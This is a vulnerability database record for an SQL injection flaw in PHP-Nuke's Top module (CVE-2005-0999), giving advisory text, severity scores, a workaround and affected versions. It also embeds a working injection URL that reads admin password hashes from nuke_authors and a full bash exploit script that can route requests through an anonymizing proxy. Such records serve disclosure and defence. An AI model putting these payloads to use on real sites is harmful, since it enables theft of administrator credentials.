PHP-Nuke Top Module querylang Parameter SQL Injection
2005-04-06T07:49:20
ID: OSVDB:15324
Type: osvdb
Reporter: OSVDB
Modified: 2005-04-06T07:49:20
Description
Solution Description
Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Change the table prefix from the default "nuke_" to something random such as "zloqf7_".
Vendor URL: http://phpnuke.org
Secunia Advisory ID: 14866
Other Advisory URL: http://www.waraxe.us/advisory-41.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0091.html
CVE-2005-0999
{"enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0999"]}, {"type": "exploitdb", "idList": ["EDB-ID:921"]}], "modified": "2017-04-28T13:20:11", "rev": 2}, "vulnersScore": 6.1}, "bulletinFamily": "software", "affectedSoftware": [], "references": [], "href": "https://vulners.com/osvdb/OSVDB:15324", "id": "OSVDB:15324", "title": "PHP-Nuke Top Module querylang Parameter SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:11", "edition": 1, "reporter": "OSVDB", "description": "## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Change the table prefix from the default \"nuke_\" to something random such as \"zloqf7_\".\n## Manual Testing Notes\nhttp://[victim]/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION\n%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*\n## References:\nVendor URL: http://phpnuke.org\n[Secunia Advisory ID:14866](https://secuniaresearch.flexerasoftware.com/advisories/14866/)\nOther Advisory URL: http://www.waraxe.us/advisory-41.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0091.html\n[CVE-2005-0999](https://vulners.com/cve/CVE-2005-0999)\n", "modified": "2005-04-06T07:49:20", "viewCount": 2, "published": "2005-04-06T07:49:20", "cvelist": ["CVE-2005-0999"]}
{"cve": [{"lastseen": "2020-10-03T11:34:53", "description": "SQL injection vulnerability in the Top module for PHP-Nuke 6.x through 7.6 allows remote attackers to execute arbitrary SQL commands via the querylang parameter.", "edition": 3, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0999", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0999"], "modified": "2016-10-18T03:16:00", "cpe": ["cpe:/a:francisco_burzi:php-nuke:6.5_rc3", "cpe:/a:francisco_burzi:php-nuke:6.5_rc1", "cpe:/a:francisco_burzi:php-nuke:7.6", "cpe:/a:francisco_burzi:php-nuke:6.0", "cpe:/a:francisco_burzi:php-nuke:6.5_rc2", "cpe:/a:francisco_burzi:php-nuke:6.6", "cpe:/a:francisco_burzi:php-nuke:6.7", "cpe:/a:francisco_burzi:php-nuke:6.5_final", "cpe:/a:francisco_burzi:php-nuke:7.0", "cpe:/a:francisco_burzi:php-nuke:7.4", "cpe:/a:francisco_burzi:php-nuke:6.5", "cpe:/a:francisco_burzi:php-nuke:7.5", "cpe:/a:francisco_burzi:php-nuke:6.9", "cpe:/a:francisco_burzi:php-nuke:6.5_beta1", "cpe:/a:francisco_burzi:php-nuke:7.1", "cpe:/a:francisco_burzi:php-nuke:7.3", "cpe:/a:francisco_burzi:php-nuke:7.2", "cpe:/a:francisco_burzi:php-nuke:7.0_final"], "id": "CVE-2005-0999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0999", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:francisco_burzi:php-nuke:6.5_beta1:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:francisco_burzi:php-nuke:6.5_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5_rc3:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.0_final:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.6:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5_final:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.9:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5_rc1:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T13:11:13", "description": "PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working). CVE-2005-0999. Webapps exploit for php platform", "published": "2005-04-07T00:00:00", "type": "exploitdb", "title": "PHP-Nuke 6.x - 7.6 Top module Remote SQL Injection Exploit working", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0999"], "modified": "2005-04-07T00:00:00", "id": "EDB-ID:921", "href": "https://www.exploit-db.com/exploits/921/", "sourceData": "#/bin/bash\r\n\r\n# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\r\n# works thou /str0ke\r\n\r\n#\r\n# PHPNuke Top Module Remote SQL Injection\r\n# by Fabrizi Andrea 2005\r\n# andrea.fabrizi [at] gmail.com\r\n#\r\n# Work with the PHPNuke latest version! 
\r\n#\r\n\r\nURL=$1;\r\nPATH=\"$2/\";\r\nANON=\"http://anonymouse.ws/cgi-bin/anon-www.cgi/\";\r\n\r\n echo -e \"\\n PHPNuke Top Module Remote SQL Injection\" \r\n echo -e \" by Fabrizi Andrea 2005\"\r\n\r\nif [ \"$URL\" = \"\" ]; then\r\n\techo -e \"\\n USAGE: $0 [URL] [NukePath]\"\r\n\techo -e \" Example: $0 www.site.net phpNuke\\n\" \r\n\texit\r\nfi;\r\n\r\nif [ $PATH = \"/\" ]; then PATH=\"\"; fi;\r\n#anon_query_url=\"$ANON\"\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\";\r\nanon_query_url=\"$ANON\"\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\"; #changed line /str0ke\r\n\r\n#query_url=\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\";\r\nquery_url=\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\"; #changed line /str0ke\r\n\r\necho -e \"\\n - Anonymous Query URL: \"$anon_query_url \"\\n\";\r\necho -e \" - Direct Query URL: \" $query_url \"\\n\";\r\necho -e \" - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\\n\"\n\n# milw0rm.com [2005-04-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/921/"}]}